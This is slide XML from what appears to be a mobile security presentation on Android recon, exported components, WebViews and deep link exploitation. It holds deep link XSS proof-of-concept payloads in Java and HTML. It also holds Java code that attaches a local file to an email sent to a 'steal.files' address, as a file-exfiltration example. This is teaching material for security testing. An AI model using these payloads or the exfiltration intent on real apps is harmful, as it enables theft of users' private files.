              <a:t> WebChromeClient());</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="2B2B2B"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//User supplied data</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="2B2B2B"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flagWebView.loadUrl(getIntent().getStringExtra("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>totally_secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"));</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="CC7832"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="2B2B2B"/>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900">
              <a:solidFill>
                <a:srgbClr val="CC7832"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="2B2B2B"/>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900">
              <a:solidFill>
                <a:srgbClr val="CC7832"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="2B2B2B"/>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66" name="Google Shape;166;p30"/>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Deep Link XSS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Proof of concept with Java</a:t>
            </a:r>
            <a:endParaRPr>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Uri uri = Uri.parse("appschema://&lt;svg onload=alert(1)&gt;");</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intent startDownloadIntent = new Intent(Intent.ACTION_VIEW, uri);</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>startActivity(startDownloadIntent);</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Proof of concept with html page</a:t>
            </a:r>
            <a:endParaRPr>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&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;a href="appschema://&lt;svg onload=alert(1)&gt;"&gt;XSS PoC&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p31"/>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Deep Link XSS Example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Overview</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;66;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83100" y="1247850"/>
            <a:ext cx="3523200" cy="42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rPr>
              <a:t>Android Workflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1400">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Android Workflow</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Android Recon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Api Key Recon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Reverse engineering apis</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Google Shape;67;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671550" y="1247850"/>
            <a:ext cx="3523200" cy="42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rPr>
              <a:t>Exported Android Components</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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Android Intents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User Input</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Webviews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How to exploit components</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580900" y="1247850"/>
            <a:ext cx="3523200" cy="42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rPr>
              <a:t>Deep Link Exploitation</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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Host validation, scheme validation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Exploiting Deeplinks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Deep link LFIs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Android public directories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Android application directories</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>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311700" y="8869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rPr>
              <a:t>Try on custom schemes and verified scheme parameters. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verified schemes such as http:// and https:// might lookup server files from the mobile application depending on implementation.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>See where the application is saving account data in res/xml/file_paths.xml</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>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rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There’s two keywords for externally saved files “external-files-path” and “external-path”. APP_DATA in the example above is what the file directory name would be in a publically accessible app directory.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="178" name="Google Shape;178;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="401575" y="2586450"/>
            <a:ext cx="6362700" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Google Shape;179;p32"/>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Deep Link LFIs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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>“Use the directories within internal storage to save sensitive information that other apps shouldn't access.”</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All applications can access those files on the mobile device</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>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Deep links can be used to exfiltrate specific files</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>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Files can be uploaded via streaming intents</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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private </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>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sendToEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(String folder_name, String file_name) {</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try {</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Intent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> = new Intent(Intent.ACTION_SENDTO);</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intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.setType("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>text/plain</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intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.putExtra(Intent.EXTRA_SUBJECT, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Subject</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intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.putExtra(Intent.EXTRA_STREAM, Uri.parse( "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file:///</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>" + folder_name + file_name));</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intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.setData(Uri.parse("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>mailto:steal.files@gmail.com</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> startActivity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>intent</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 catch(Exception e)  {</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System.out.println("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Email did not send because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>" + e);</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457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Google Shape;185;p33"/>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Files Stored in Public Directories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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Environment.getExternalStorageDirectory()                                                                /storage/sdcard0</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Environment.getExternalStoragePublicDirectory(DIRECTORY_ALARMS)                /storage/sdcard0/Alarms</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Environment.getExternalStoragePublicDirectory(DIRECTORY_DCIM)                     /storage/sdcard0/DCIM</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Environment.getExternalStoragePublicDirectory(DIRECTORY_DOWNLOADS)      /storage/sdcard0/Download</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Environment.getExternalStoragePublicDirectory(DIRECTORY_MOVIES)                /storage/sdcard0/Movies</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Environment.getExternalStoragePublicDirectory(DIRECTORY_MUSIC)                  /storage/sdcard0/Music</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Environment.getExternalStoragePublicDirectory(DIRECTORY_NOTIFICATIONS)  /storage/sdcard0/Notifications</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Environment.getExternalStoragePublicDirectory(DIRECTORY_PICTURES)            /storage/sdcard0/Pictures</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Environment.getExternalStoragePublicDirectory(DIRECTORY_PODCASTS)          /storage/sdcard0/Podcasts</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Environment.getExternalStoragePublicDirectory(DIRECTORY_RINGTONES)         /storage/sdcard0/Ringtones</a:t>
            </a:r>
            <a:endParaRPr sz="12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0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application directories that can be accessed with read/write granted permissions then it’s basically public</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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/sdcard/Android/data/com.example/appdata/example.pdf</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Google Shape;191;p34"/>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Public Android Directories</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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="505450"/>
            <a:ext cx="9144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Proof of concept with Java</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="9877D4"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
